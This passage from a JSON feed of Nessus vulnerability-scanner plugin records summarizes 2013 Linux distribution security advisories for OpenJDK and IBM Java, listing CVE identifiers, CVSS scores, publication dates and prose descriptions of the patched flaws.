SR16-FP4 has been released which fixes lots of bugs and security issues.\n\nMore information can be found on :\n\nhttp://www.ibm.com/developerworks/java/jdk/alerts/\n\nCVEs fixed: CVE-2013-4041, CVE-2013-5375, CVE-2013-5372, CVE-2013-5843, CVE-2013-5830, CVE-2013-5829, CVE-2013-5842, CVE-2013-5782, CVE-2013-5817, CVE-2013-5809, CVE-2013-5814, CVE-2013-5802, CVE-2013-5804, CVE-2013-5783, CVE-2013-3829, CVE-2013-4002, CVE-2013-5774, CVE-2013-5825, CVE-2013-5840, CVE-2013-5801, CVE-2013-5778, CVE-2013-5849, CVE-2013-5790, CVE-2013-5780, CVE-2013-5797, CVE-2013-5803\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2015-05-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=83601", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5778", "CVE-2013-5375", "CVE-2013-5842", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5372", "CVE-2013-5843", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-4041", "CVE-2013-5829", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5797"], "lastseen": "2017-10-29T13:36:32"}, {"id": "ORACLELINUX_ELSA-2013-1505.NASL", "type": "nessus", "title": "Oracle Linux 5 / 6 : java-1.6.0-openjdk (ELSA-2013-1505)", "description": "From Red Hat Security Advisory 2013:1505 :\n\nUpdated java-1.6.0-openjdk packages that fix various security issues are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. (CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)\n\nMultiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions.\n(CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840, CVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.\n(CVE-2013-5804, CVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. (CVE-2013-5803)\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.", "published": "2013-11-06T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=70770", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2017-10-29T13:45:49"}, {"id": "SL_20131105_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "type": "nessus", "title": "Scientific Linux Security Update : java-1.6.0-openjdk on SL5.x, SL6.x i386/x86_64", "description": "Multiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. (CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)\n\nMultiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions.\n(CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840, CVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.\n(CVE-2013-5804, CVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross- site scripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. (CVE-2013-5803)\n\nAll running instances of OpenJDK Java must be restarted for the update to take effect.", "published": "2013-11-06T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=70772", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2017-10-29T13:34:31"}, {"id": "ALA_ALAS-2013-246.NASL", "type": "nessus", "title": "Amazon Linux AMI : java-1.6.0-openjdk (ALAS-2013-246)", "description": "Multiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. (CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2013-5829 , CVE-2013-5814 , CVE-2013-5817 , CVE-2013-5842 , CVE-2013-5850)\n\nMultiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions.\n(CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. (CVE-2013-5825 , CVE-2013-4002 , CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2013-3829 , CVE-2013-5840 , CVE-2013-5774 , CVE-2013-5783 , CVE-2013-5820 , CVE-2013-5849 , CVE-2013-5790 , CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.\n(CVE-2013-5804 , CVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. (CVE-2013-5803)", "published": "2013-11-14T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=70908", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2018-04-19T07:38:16"}, {"id": "SUSE_11_JAVA-1_6_0-OPENJDK-131129.NASL", "type": "nessus", "title": "SuSE 11.2 Security Update : OpenJDK 1.6 (SAT Patch Number 8598)", "description": "OpenJDK 1.6 was updated to the new Icedtea release 1.12.7, which includes many fixes for bugs and security issues :\n\n - S8006900, CVE-2013-3829: Add new date/time capability\n\n - S8008589: Better MBean permission validation\n\n - S8011071, CVE-2013-5780: Better crypto provider handling\n\n - S8011081, CVE-2013-5772: Improve jhat\n\n - S8011157, CVE-2013-5814: Improve CORBA portablility\n\n - S8012071, CVE-2013-5790: Better Building of Beans\n\n - S8012147: Improve tool support\n\n - S8012277: CVE-2013-5849: Improve AWT DataFlavor\n\n - S8012425, CVE-2013-5802: Transform TransformerFactory\n\n - S8013503, CVE-2013-5851: Improve stream factories\n\n - S8013506: Better Pack200 data handling\n\n - S8013510, CVE-2013-5809: Augment image writing code\n\n - S8013514: Improve stability of cmap class\n\n - S8013739, CVE-2013-5817: Better LDAP resource management\n\n - S8013744, CVE-2013-5783: Better tabling for AWT\n\n - S8014085: Better serialization support in JMX classes\n\n - S8014093, CVE-2013-5782: Improve parsing of images\n\n - S8014102, CVE-2013-5778: Improve image conversion\n\n - S8014341, CVE-2013-5803: Better service from Kerberos servers\n\n - S8014349, CVE-2013-5840: (cl) Class.getDeclaredClass problematic in some class loader configurations\n\n - S8014530, CVE-2013-5825: Better digital signature processing\n\n - S8014534: Better profiling support\n\n - S8014987, CVE-2013-5842: Augment serialization handling\n\n - S8015614: Update build settings\n\n - S8015731: Subject java.security.auth.subject to improvements\n\n - S8015743, CVE-2013-5774: Address internet addresses\n\n - S8016256: Make finalization final\n\n - S8016653, CVE-2013-5804: javadoc should ignore ignoreable characters in names\n\n - S8016675, CVE-2013-5797: Make Javadoc pages more robust\n\n - S8017196, CVE-2013-5850: Ensure Proxies are handled appropriately\n\n - S8017287, CVE-2013-5829: Better resource disposal\n\n - S8017291, CVE-2013-5830: Cast Proxies Aside\n\n - S8017298, CVE-2013-4002: Better XML support\n\n - S8017300, CVE-2013-5784: Improve Interface Implementation\n\n - S8017505, CVE-2013-5820: Better Client Service\n\n - S8019292: Better Attribute Value Exceptions\n\n - S8019617: Better view of objects\n\n - S8020293: JVM crash\n\n - S8021290, CVE-2013-5823: Better signature validation\n\n - S8022940: Enhance CORBA translations\n\n - S8023683: Enhance class file parsing", "published": "2013-12-03T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=71171", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2017-10-29T13:42:03"}, {"id": "UBUNTU_USN-2033-1.NASL", "type": "nessus", "title": "Ubuntu 10.04 LTS / 12.04 LTS : openjdk-6 vulnerabilities (USN-2033-1)", "description": "Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-3829, CVE-2013-5783, CVE-2013-5804)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to availability. An attacker could exploit these to cause a denial of service. (CVE-2013-4002, CVE-2013-5803, CVE-2013-5823, CVE-2013-5825)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to data integrity. (CVE-2013-5772, CVE-2013-5774, CVE-2013-5784, CVE-2013-5797, CVE-2013-5820)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to information disclosure. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-5778, CVE-2013-5780, CVE-2013-5790, CVE-2013-5840, CVE-2013-5849, CVE-2013-5851)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity and availability. An attacker could exploit these to cause a denial of service or expose sensitive data over the network. (CVE-2013-5782, CVE-2013-5802, CVE-2013-5809, CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5830, CVE-2013-5842, CVE-2013-5850).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2013-11-22T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=71037", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2017-10-29T13:43:18"}, {"id": "CENTOS_RHSA-2013-1505.NASL", "type": "nessus", "title": "CentOS 5 / 6 : java-1.6.0-openjdk (CESA-2013:1505)", "description": "Updated java-1.6.0-openjdk packages that fix various security issues are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. (CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)\n\nMultiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions.\n(CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840, CVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.\n(CVE-2013-5804, CVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. (CVE-2013-5803)\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.", "published": "2013-11-06T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=70769", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2017-10-29T13:33:27"}, {"id": "REDHAT-RHSA-2013-1505.NASL", "type": "nessus", "title": "RHEL 5 / 6 : java-1.6.0-openjdk (RHSA-2013:1505)", "description": "Updated java-1.6.0-openjdk packages that fix various security issues are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime Environment and the OpenJDK 6 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. (CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)\n\nMultiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions.\n(CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840, CVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks.\n(CVE-2013-5804, CVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. (CVE-2013-5803)\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.", "published": "2013-11-06T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=70771", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2017-10-29T13:40:32"}, {"id": "REDHAT-RHSA-2013-1509.NASL", "type": "nessus", "title": "RHEL 5 / 6 : java-1.5.0-ibm (RHSA-2013:1509)", "description": "Updated java-1.5.0-ibm packages that fix several security issues are now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nIBM J2SE version 5.0 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java Runtime Environment and the IBM Java Software Development Kit. Detailed vulnerability descriptions are linked from the IBM Security alerts page, listed in the References section. (CVE-2013-3829, CVE-2013-4041, CVE-2013-5372, CVE-2013-5375, CVE-2013-5774, CVE-2013-5778, CVE-2013-5780, CVE-2013-5782, CVE-2013-5783, CVE-2013-5790, CVE-2013-5797, CVE-2013-5801, CVE-2013-5802, CVE-2013-5803, CVE-2013-5804, CVE-2013-5809, CVE-2013-5814, CVE-2013-5817, CVE-2013-5825, CVE-2013-5829, CVE-2013-5830, CVE-2013-5840, CVE-2013-5842, CVE-2013-5843, CVE-2013-5849)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated packages, containing the IBM J2SE 5.0 SR16-FP4 release. All running instances of IBM Java must be restarted for this update to take effect.", "published": "2013-11-08T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=70793", "cvelist": ["CVE-2013-5782", "CVE-2013-5778", "CVE-2013-5375", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5372", "CVE-2013-5825", "CVE-2013-5843", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-4041", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5797", "CVE-2013-5804"], "lastseen": "2017-10-29T13:34:07"}, {"id": "REDHAT-RHSA-2013-1451.NASL", "type": "nessus", "title": "RHEL 6 : java-1.7.0-openjdk (RHSA-2013:1451)", "description": "Updated java-1.7.0-openjdk packages that fix various security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. (CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850, CVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java 